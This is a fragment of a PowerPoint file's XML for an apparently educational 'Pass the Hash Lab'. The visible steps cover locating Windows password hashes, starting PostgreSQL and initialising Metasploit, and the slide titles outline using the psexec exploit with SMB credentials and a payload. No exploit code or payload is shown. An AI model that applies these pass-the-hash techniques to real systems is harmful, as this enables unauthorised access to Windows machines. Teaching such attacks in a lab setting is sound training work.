            <a:pPr lvl="2" rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If necessary, refer to the ifconfig lab to learn how to get IP Addresses​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify Connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If necessary, refer to the ping Lab to verify connectivity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locate the Windows Password Hashes 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Have the hashes handy for later in the lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Refer to the privilege escalation lab to locate the Windows Password Hashes (end of the lab)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tw Cen MT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4A6BC-D2FA-4517-96E4-151325454709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7208417" y="3864303"/>
            <a:ext cx="1847461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650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MUST HAVE!!!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132258-8213-4914-920C-88E837EF217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705600" y="4010497"/>
            <a:ext cx="502817" cy="7382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8000"/>
            <a:ext cx="7955973" cy="3576461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/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In the Kali environment, open Terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Enter the following command to start the PostgreSQL database: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter the following command to start the Metasploit framework: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a: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2746B-BBE4-4EC9-91E5-48892FEE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13" y="332744"/>
            <a:ext cx="3156170" cy="1284412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9102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131</TotalTime>
  <Words>765</Words>
  <Application>Microsoft Office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Pass the Hash Lab</vt:lpstr>
      <vt:lpstr>Pre-requisites</vt:lpstr>
      <vt:lpstr>Objectives Covered</vt:lpstr>
      <vt:lpstr>What is a Pass the Hash Attack?</vt:lpstr>
      <vt:lpstr>The Pass the Hash Lab</vt:lpstr>
      <vt:lpstr>Setup Environments</vt:lpstr>
      <vt:lpstr>Find Necessary Information</vt:lpstr>
      <vt:lpstr>Initialize Metasploit</vt:lpstr>
      <vt:lpstr>Initialize Metasploit</vt:lpstr>
      <vt:lpstr>Start the psexec Exploit</vt:lpstr>
      <vt:lpstr>Examine psexec Exploit Options</vt:lpstr>
      <vt:lpstr>SM-what?</vt:lpstr>
      <vt:lpstr>Find SMBUser and SMBPass</vt:lpstr>
      <vt:lpstr>Set psexec Options</vt:lpstr>
      <vt:lpstr>Set the Payload</vt:lpstr>
      <vt:lpstr>Set Payload Options</vt:lpstr>
      <vt:lpstr>Pass the Hash</vt:lpstr>
      <vt:lpstr>How to Defend Against a Pass the Hash attack?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51</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T18:04:08Z</dcterms:modified>
</cp:coreProperties>
</file>